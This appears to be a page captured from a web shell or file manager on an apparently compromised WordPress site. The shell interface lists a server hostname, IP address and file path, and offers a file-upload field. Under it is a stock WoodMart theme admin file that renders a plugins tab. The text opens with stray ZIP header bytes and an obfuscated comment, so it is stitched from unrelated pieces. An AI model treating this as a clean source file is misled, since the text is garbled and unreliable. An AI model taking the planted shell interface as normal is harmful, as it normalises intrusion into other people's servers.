PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/oligap/public_html/wp-content/themes/woodmart/inc/admin/dashboard/views/tabs/
Server: Linux cloud.virginhosting.lk 4.18.0-477.27.2.lve.el8.x86_64 #1 SMP Wed Oct 11 12:32:56 UTC 2023 x86_64
IP: 128.140.68.198
Choose File :

Url:
Dir : //home/oligap/public_html/wp-content/themes/woodmart/inc/admin/dashboard/views/tabs/plugins.php

<?php

$compatible_plugins = woodmart_get_config( 'compatible-plugins' );

?>

<div class="woodmart-row woodmart-one-column xts-plugins-tab">
	<div class="woodmart-column woodmart-stretch-column">
		<div class="woodmart-column-inner">
			<div class="wd-box xts-dashboard">
				<div class="woodmart-box-header">
					<h2>
						<?php esc_html_e( 'Theme related plugins', 'woodmart' ); ?>
					</h2>
				</div>
				<div class="woodmart-box-content">
					<?php get_template_part( 'inc/admin/setup-wizard/templates/plugins', '', array( 'show_plugins' => 'theme_plugin' ) ); ?>
				</div>
				<?php if ( ! woodmart_get_opt( 'white_label' ) ) : ?>
					<div class="woodmart-box-footer">
						<p>Plugins marked with "Required" label are needed for the smooth operation of the WoodMart theme. Other plugins provide additional functionality but may be deleted if they are not necessary.</p>
					</div>
				<?php endif; ?>
			</div>
		</div>
	</div>
</div>

<?php if ( $compatible_plugins ) : ?>
	<div class="woodmart-row woodmart-one-column xts-plugins-tab">
		<div class="woodmart-column woodmart-stretch-column">
			<div class="woodmart-column-inner">
				<div class="wd-box xts-dashboard">
					<div class="woodmart-box-header">
						<h2>
							<?php esc_html_e( 'Compatible plugins', 'woodmart' ); ?>
						</h2>
					</div>
					<div class="woodmart-box-content woodmart-compatible-plugins">
						<?php get_template_part( 'inc/admin/setup-wizard/templates/plugins', '', array( 'show_plugins' => 'compatible' ) ); ?>
					</div>
					<?php if ( ! woodmart_get_opt( 'white_label' ) ) : ?>
						<div class="woodmart-box-footer">
							<p>
								<?php esc_html_e( 'Didn\'t find a compatible plugin?', 'woodmart' ); ?>
								<a href="https://xtemos.com/forums/forum/woodmart-premium-template/">
									<?php esc_html_e( 'Get help', 'woodmart' ); ?>
								</a>
							</p>
						</div>
					<?php endif; ?>
				</div>
			</div>
		</div>
	</div>
<?php endif; ?>